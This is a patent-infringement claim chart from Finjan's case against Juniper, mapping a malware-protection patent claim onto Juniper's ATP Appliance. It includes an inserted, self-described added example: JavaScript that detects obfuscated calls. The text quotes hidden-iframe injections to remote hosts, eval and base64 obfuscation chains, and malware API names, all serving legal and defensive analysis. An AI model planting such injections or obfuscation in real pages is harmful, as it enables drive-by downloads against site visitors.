Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 1 of 17

EXHIBIT 3

Juniper's ATP Appliance
8,141,154

The statements and documents cited below are based on information available to Finjan, Inc. at the time this chart was created. Finjan reserves its right to supplement this chart as additional information becomes known to it.

For purposes of this chart, "ATP Appliance" includes at least the models identified in Exhibit A, used individually or in combination. ATP Appliances perform the infringing procedures on their own or as a distributed system in combination with Juniper Sky Advanced Threat Prevention ("Sky ATP")[1], as described in greater detail herein. Based on public information, all ATP Appliances operate identically with respect to the identified claims and vary only in software specifications and/or deployment options.

As identified and described element by element below, one or more of the ATP Appliances infringe claim 1 of the '154 Patent.

Claim 1

1a. A system for protecting a computer from dynamically generated malicious content, comprising: a content processor (i) for processing content received over a network, the content including a call to a first function, and the call including an input, and (ii) for invoking a second function with the input, only if a security computer indicates that such invocation is safe;

ATP Appliances meet the recited claim language because they provide a system with a content processor for processing content received over a network, the content including a call to a first function, and the call including an input, and for invoking a second function with the input only if a security computer indicates that such invocation is safe.

ATP Appliances meet the recited claim language because they protect computers from dynamically generated malicious content delivered through the web, email, and lateral threats (e.g., drive-by downloads; zero-day vulnerabilities that serve ransomware; backdoors that exploit browser and Adobe vulnerabilities; web attack toolkits using JavaScript; URL-based malware propagating through websites and email; and Trojans that connect to URLs to download potentially malicious files) using behavior-based technologies for processing content received over a network. The content includes a call to a first function (such as a script function call, an action in a PDF file, or an iframe, as discussed in more detail below), and the call includes an input (such as obfuscated content or the arguments of the JavaScript function or PDF action, which can include an address, URL, URI, or IP address of a compromised website). The ATP Appliances invoke a second function (such as a script function call, a PDF action, or an iframe, as discussed in more detail below) with the input only if the ATP Appliance or Sky ATP indicates that such invocation is safe.

As shown, ATP Appliances include "collector" and "SmartCore" components. ATP Appliances include software and/or hardware in the collector components to transmit the input to the SmartCore components of an ATP Appliance, which operate as a security computer that inspects the input using static analysis, YARA, payload analysis, machine learning and behavioral analysis, malware reputation analysis, and SmartCore technology, and returns a result that indicates whether the content is safe to invoke.

[1] "Sky ATP" includes all components and services described in Exhibit A.

Examples of first functions are JavaScript and iframes that can be embedded in HTTP communications and are used to obfuscate or hide redirects that download malicious code, shellcode, or payloads from a compromised web page, as in "drive-by downloads." Examples of first functions in the form of JavaScript functions include eval, unescape, and document.write. For example, eval functions such as eval(base64_decode…) and eval(gzinflate…) are used to obfuscate or conceal automatic downloads of malware from a suspicious link or URI (e.g., malicious JavaScript, shellcode, drive-by downloads, droppers, installers, malicious binaries). Typically the shellcode is staged: a small first-stage payload is inserted into the exploit and is designed to download a larger second-stage payload that extends the shellcode's functionality. This web or HTTP content can include a call to a first function, where the call can be any of a number of function calls written in JavaScript (e.g., eval, unescape, document.write, OnLoad, OnClick, OnMouseover, OnChange) or other functions used for obfuscation, redirection, heap spraying (e.g., NOP slides), or payload delivery (e.g., ROP, download-and-execute malware).

Another example of a first function is unescape() called with a large amount of escaped data. Such activity is suspicious because it indicates an attempt to inject a large amount of shellcode or malicious HTML and/or JavaScript for the purpose of taking control of a system through a browser vulnerability. An example of a first function in the form of document.write() is document.write(unescape([obfuscated code])), where the first function is document.write(). When the document.write function is executed, the result is an iframe injection that downloads from a link or URL hidden via a 0x0 iframe.

Other examples of first functions are functions within PDFs that specify an action to be performed automatically when the document is viewed, such as downloading malware from a suspicious link or URL (e.g., OpenAction); Embed or Launch SWF functions within a PDF for running an embedded video file; and functions for launching JavaScript within a PDF (e.g., Launch).

Examples of second functions include recursive or suspicious scripts for obfuscating malicious links/URIs, such as eval, unescape, and document.write. In the following example, eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IE…')) is a second function that recursively decodes the obfuscated code "ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IE…". Indirect calls to eval that reference the local scope of the current function, or unimplemented features (e.g., the document.lastModified property), are further examples of second functions.

In another example, the first functions described above are used to conceal the intent to invoke a second function with the input (e.g., a script or an embedded malicious iframe that obfuscates the malicious link or URI), such as document.write("<iframe src="http: //cool .cn/ in.cgi?" width=1 height=1 style="visibility: hidden"></iframe>"). In this example, the second function (the injected iframe, with the input "http: //cool.cn/ in.cgi?") is obfuscated by document.write. Additional combinations of functions include document.write(unescape([input])), where the first function is document.write and the second function is unescape. Other examples include scripts or iframes that perform mouse or keyboard interaction with a partially hidden element.

Another example is an email with a link to a video about a news story, where another valid page can be "hidden" on top of or underneath the "PLAY" control of the video. When the apparent "play" function is attempted, a different second function is actually invoked. Such second functions typically take the form of embedded script that loads another page over the video in a transparent layer using a concealed link or URI.

Second functions are typically a subsequent function that causes a download from the same URL, such as connecting to or downloading files from a remote command and control (CnC) server using HTTPSendRequest or InternetReadFile with the input (e.g., URL, IP, file). The content processor will invoke a second function (e.g., an HTTPS file download) with the input (e.g., a URL) only if the security computer indicates that such invocation is safe.

Second functions include sending results to a protected computer for automatically downloading from an obfuscated remote location and/or launching concealed input using certain combinations of JavaScript, iframe injections, and/or PDF actions (e.g., OpenAction or Launch). Examples include JavaScript and OpenAction functions within PDFs for launching or downloading code that exploits vulnerabilities in Adobe Reader and Adobe Acrobat, such as malicious JavaScript, shellcode, drive-by downloads, droppers, installers, and malicious binaries. Examples of such functions include URLDownloadToFile() for dropping malicious binaries; heap spraying functions, including memory-related functions using PROCESS_MEMORY_COUNTERS; JavaScript functions in PDFs for connecting to the Internet or making a network connection, such as app.mailMsg() and app.launchURL(), as well as CONNECT-related and LISTEN-related functions; functions for executing malware via DLL injection, such as CreateRemoteThread(); and functions for executing dropped malware, such as NtCreateProcess().

The content processor can block attempts to invoke a second function with the input, such as a subsequent call to download from the URL (e.g., NetOpenURL, Connect/ConnectEx to a URL, Send/Ex to a URL/IP, URLDownloadToFileA, URLDownloadToFileW, URLDownloadToCacheFileA, and URLDownloadToCacheFileW).

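The first-function / second-function pattern described above, as an added worked example that is not part of the chart and is not Juniper's or Finjan's code: a content processor extracts document.write and eval calls from a page, hands each call's input to a security-computer routine that peels unescape()/atob() layers and checks for the hidden 1x1 iframe, nested-decoding and large-escaped-blob patterns the chart lists, and invokes the second function only when the returned indicator is safe. One caveat on the chart's own examples: base64_decode and gzinflate are PHP functions, so eval(base64_decode(...)) is server-side PHP obfuscation; the browser-side analogue used here is atob. The heuristics and thresholds, the placeholder host example.invalid, and the sample page are all constructed for this illustration.

```javascript
// Added example, not Juniper's or Finjan's code: a content processor that
// invokes a "second function" only after a security computer returns a safe
// indicator for the call's input. Heuristics, thresholds and the sample page
// are constructed for illustration. Node: escape/unescape/Buffer are globals.
// Strip one obfuscation layer the chart names: unescape("...") or atob("...")
// (atob is the browser-side analogue of PHP's base64_decode).
function peelLayer(expr) {
  const m = /^\s*(unescape|atob)\(\s*(['"])([\s\S]*?)\2\s*\)\s*$/.exec(expr);
  if (!m) return null;
  try {
    return m[1] === 'atob' ? Buffer.from(m[3], 'base64').toString('latin1') : unescape(m[3]);
  } catch (e) { return null; }
}

// Security computer: static inspection of one input. Returns the indicator
// (safe or not, with reasons) together with the fully decoded input.
function inspectInput(input) {
  const reasons = [];
  let decoded = input, layers = 0;
  for (let inner = peelLayer(decoded); inner !== null; inner = peelLayer(decoded)) {
    decoded = inner; layers += 1;
  }
  const lit = /^\s*(['"])([\s\S]*)\1\s*$/.exec(decoded);   // bare string literal
  if (lit) decoded = lit[2];
  if (layers >= 2) reasons.push('nested decoding (' + layers + ' layers)');
  // "unescape() with a large amount of escaped data", e.g. a %90 NOP slide.
  const escaped = (input.match(/%u?[0-9a-fA-F]{2,4}/g) || []).length;
  if (escaped >= 40) reasons.push('large escaped blob (' + escaped + ' sequences)');
  // Hidden 0x0 / 1x1 or invisible iframe pointing at a remote URL.
  const iframe = /<iframe\b([^>]*)>/i.exec(decoded);
  if (iframe) {
    const tiny = /\b(width|height)\s*=\s*["']?[01]\b/i.test(iframe[1]);
    const hidden = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(iframe[1]);
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(iframe[1]);
    if (tiny || hidden) reasons.push('hidden iframe to ' + (src ? src[1] : '(no src)'));
  }
  return { safe: reasons.length === 0, reasons: reasons, decoded: decoded, layers: layers };
}

// First functions watched for (textual scan; a real implementation parses).
const FIRST_FUNCTIONS = ['document.write', 'eval'];

// Each first-function call in a script with its input (the argument text),
// honouring nested parentheses and quoted strings.
function extractCalls(script) {
  const calls = [];
  for (const name of FIRST_FUNCTIONS) {
    for (let at = script.indexOf(name + '('); at >= 0; at = script.indexOf(name + '(', at + 1)) {
      const open = at + name.length;
      let depth = 0, quote = null, i = open;
      for (; i < script.length; i++) {
        const c = script[i];
        if (quote) { if (c === '\\') i += 1; else if (c === quote) quote = null; }
        else if (c === '"' || c === "'") quote = c;
        else if (c === '(') depth += 1;
        else if (c === ')' && --depth === 0) break;
      }
      calls.push({ fn: name, input: script.slice(open + 1, i) });
    }
  }
  return calls;
}

// Content processor: transmit each input to the security computer, receive the
// indicator, and invoke the second function only if safe. The second function
// is modelled by pushing decoded markup/code into `sink` (document.write/eval).
function processContent(html, securityComputer, sink) {
  const log = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (let m = scriptRe.exec(html); m !== null; m = scriptRe.exec(html)) {
    for (const call of extractCalls(m[1])) {
      const indicator = securityComputer(call.input);      // transmit, then receive
      if (indicator.safe) {
        sink.push(indicator.decoded);                      // second function invoked
        log.push({ fn: call.fn, action: 'invoked' });
      } else {
        log.push({ fn: call.fn, action: 'blocked', reasons: indicator.reasons });
      }
    }
  }
  return log;
}

// Constructed sample page: a benign write, a hidden-iframe injection of the
// document.write(unescape(...)) shape the chart describes, and a two-layer
// eval(atob(unescape(...))) chain. example.invalid is a placeholder host.
const HIDDEN_IFRAME = '<iframe src="http://example.invalid/in.cgi?" width=1 height=1 style="visibility: hidden"></iframe>';
const STAGE2 = "unescape('%61%6c%65%72%74%28%31%29')";       // decodes to alert(1)
const SAMPLE_PAGE = [
  '<html><body><p>News</p>',
  '<script>document.write("<p>Posted today</p>");</script>',
  '<script>document.write(unescape("' + escape(HIDDEN_IFRAME) + '"));</script>',
  '<script>eval(atob("' + Buffer.from(STAGE2).toString('base64') + '"));</script>',
  '</body></html>',
].join('\n');

function runSample() {
  const sink = [];
  return { sink: sink, log: processContent(SAMPLE_PAGE, inspectInput, sink) };
}
```

Running runSample() writes only the benign paragraph into the sink; the unescape-wrapped iframe is blocked as a hidden iframe to the placeholder host, and the atob/unescape chain is blocked for nested decoding. The separation mirrors the claim structure: extractCalls and processContent are the content processor, inspectInput is the security computer, and the verdict object is the indicator that crosses between them.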
As shown below, the ATP Appliances interface with a security computer comprising the SmartCore analytics engine, static analysis, YARA, dynamic analysis, payload analysis, machine learning, behavioral analysis, and reputation analysis.

As described below, ATP Appliances perform a second function only if the SmartCore components determine that invoking this function is safe. ATP Appliances include the ability to mitigate and/or block malicious content based on the input, including by blocking malicious connections, protecting cloud assets, or prevention through third-party security devices.

ATP Appliances protect against dynamically generated malicious content by processing content received over a network that includes content for a drive-by download. The content includes a call to a first function, and the call includes an input that would direct the user to a drive-by-download location. ATP Appliances invoke a second function with this input only if the ATP Appliances indicate that such invocation is safe. In particular, ATP Appliances use chain heuristics to identify malicious traffic, including identifying web pages that redirect to dubious links. ATP Appliances use this information to perform browser behavior analysis in a SmartCore security computer that simulates an HTTP session to determine whether invoking content (such as addresses, URLs, URIs, IPs, and artifacts) is potentially harmful. ATP Appliances also analyze input in the form of dropper analysis on dropped files (artifacts) that are malware.

As shown in the table below, the ATP Appliances interface with Sky ATP to submit inputs related to the location of C&C servers and infected cloud hosts, IP addresses for GeoIP location and blacklists, extracted file content for analysis and C&C hits, content for malware analysis and threat detection, and content for internal compromise detection. ATP Appliances also interface with Spotlight Secure as a security computer.

(Source: sky-atp-admin-guide.pdf)

ATP Appliances also interface with an array of sandboxes as security computers, submitting inputs to determine whether they are malicious based on their behaviors. The security computers perform dynamic analysis and return an indicator of whether it is safe to invoke the second function with the input.

ATP Appliances meet this element under the doctrine of equivalents. ATP Appliances perform the same function because they receive incoming content, inspect the content using an engine (such as antivirus, static analysis, and dynamic analysis) for scanning, and proceed with the content's function calls if the content is determined safe. This is the same function as the claim element, which receives content, uses a security computer to determine whether the invocation is safe, and invokes a second function with the input. In this way, once the content has been received, inspected by the engine, and determined safe, the second function can be invoked with the input.

ATP Appliances perform the same function in the same way because they receive incoming content that includes a call to a first function and an input, use an engine (such as antivirus, static analysis, and dynamic analysis) to scan the incoming content and determine whether it is safe, and then invoke the second function with the input. This is the same way as the claim element, which receives content, uses a security computer to determine whether the invocation is safe, and invokes a second function with the input. ATP Appliances perform it the same way because they receive incoming content with a call to a first function and an input, use scanners driven by an engine to determine whether the input is safe, and invoke the second function with the input. In this way, the way of receiving the content with a first function and an input, and invoking the second function after a security computer has inspected the input, is accomplished.

ATP Appliances achieve the same result because they receive incoming content, inspect the content using an engine (such as antivirus, static analysis, and dynamic analysis) for scanning, and proceed with the content's function calls if the content is determined safe. This is the same result as the claim element, which receives content, uses a security computer to determine whether the invocation is safe, and invokes a second function with the input. ATP Appliances achieve this result because they invoke the second function with the input after scanning determines that the first function call with the input is safe. In this way, the result of receiving the content with a first function and an input, and invoking the second function after a security computer has inspected the input, is accomplished.

a transmitter for transmitting the input to the security computer for inspection, when the first function is invoked; and

ATP Appliances meet the recited claim language because they include a transmitter for transmitting the input to the security computer for inspection when the first function is invoked.

ATP Appliances meet this claim element because they include software and/or hardware components that maintain a network connection (a transmitter) for transmitting an input to a SmartCore component of the ATP Appliances for security evaluation of the input. ATP Appliances use this transmitter in their collector components to send the input (as described above and incorporated herein by reference) to the SmartCore components through a predefined interface for submitting content. The SmartCore components of the ATP Appliances operate as a security computer because they analyze the input (using the analytics engine, static analysis, YARA, payload analysis, dynamic analysis, machine learning and behavioral analysis, malware reputation analysis, and SmartCore technology) to determine whether it performs malicious or suspicious operations or for some other reason poses a security risk. The input is transmitted when the first function is invoked because the collector components of the ATP Appliances transmit inputs such as automatically invoked files, obfuscated content, and the arguments of the JavaScript function or PDF action, which can include a URL or URI to a compromised website. In another scenario, the ATP Appliance uses a software component as part of its dynamic analysis to submit inputs to an array of sandboxes (security computers) for additional analysis.

The figure below shows that the collector components of the ATP Appliance include a transmitter for sending an input to the SmartCore components of the ATP Appliance. As shown, the collector components include software and/or hardware to transmit the input to a SmartCore component, which operates as a security computer that inspects the input using the analytics engine, static analysis, YARA, payload analysis, dynamic analysis, machine learning and behavioral analysis, malware reputation analysis, and SmartCore technology.

Architecture and Key Components

ATP Appliances include a transmitter for sending an input to Sky ATP. ATP Appliances include software and/or hardware to transmit the input to Sky ATP, which operates as a security computer that inspects the input using a cache, antivirus, static analysis, dynamic analysis, and internal compromise detection databases. ATP Appliances also interface with Spotlight Secure as a security computer.

(Source: sky-atp-admin-guide.pdf)

The ATP Appliance also includes software and/or hardware that transmits the input to an array of sandboxes as security computers to determine whether it is malicious based on its behavior. The array of sandboxes returns an indicator used to determine whether it is safe to invoke the content.

a receiver for receiving an indicator from the security computer whether it is safe to invoke the second function with the input.

ATP Appliances meet the recited claim language because they include a receiver for receiving an indicator from the security computer whether it is safe to invoke the second function with the input.

ATP Appliances meet this claim element because they include software and/or hardware components that maintain a network connection (a receiver) for receiving an indicator from a SmartCore component of the ATP Appliances. The collector components of the ATP Appliances use this receiver to receive the security results over the network connection from the SmartCore components through a predefined interface. The SmartCore component of the ATP Appliances includes information on whether it is safe to invoke the second function (as described above and incorporated herein by reference) with the input because it identifies malicious or suspicious operations, and that information is sent to the receiver in the collector of the ATP Appliances. In another scenario, the ATP Appliance uses a software component as part of its dynamic analysis to receive the results of inputs submitted to an array of sandboxes (security computers) for additional analysis and to determine whether the second function is safe to invoke with the input.

The figure below shows that ATP Collectors include a receiver for receiving an indicator from the SmartCore component on whether it is safe to invoke the second function with the input. As shown, the collector components of the ATP Appliances include software and/or hardware to receive results from the SmartCore components, which operate as a security computer that inspects the input using static analysis, YARA, payload analysis, machine learning and behavioral analysis, malware reputation analysis, and SmartCore technology.

ATP Appliances include a receiver for receiving an indicator from Sky ATP on whether it is safe to invoke the second function with the input. ATP Appliances include software and/or hardware to receive results from Sky ATP, which operates as a security computer that inspects the input using a cache, antivirus, static analysis, dynamic analysis, and internal compromise detection databases to determine whether it is safe to invoke. ATP Appliances also interface with Spotlight Secure as a security computer.

(Source: sky-atp-admin-guide.pdf)

ATP Appliances also include software and/or hardware that receive an indicator from the array of sandboxes as security computers, which determine whether inputs are malicious based on their behaviors and whether the file is safe to invoke. The array of sandboxes returns an indicator used to determine whether it is safe to invoke the content.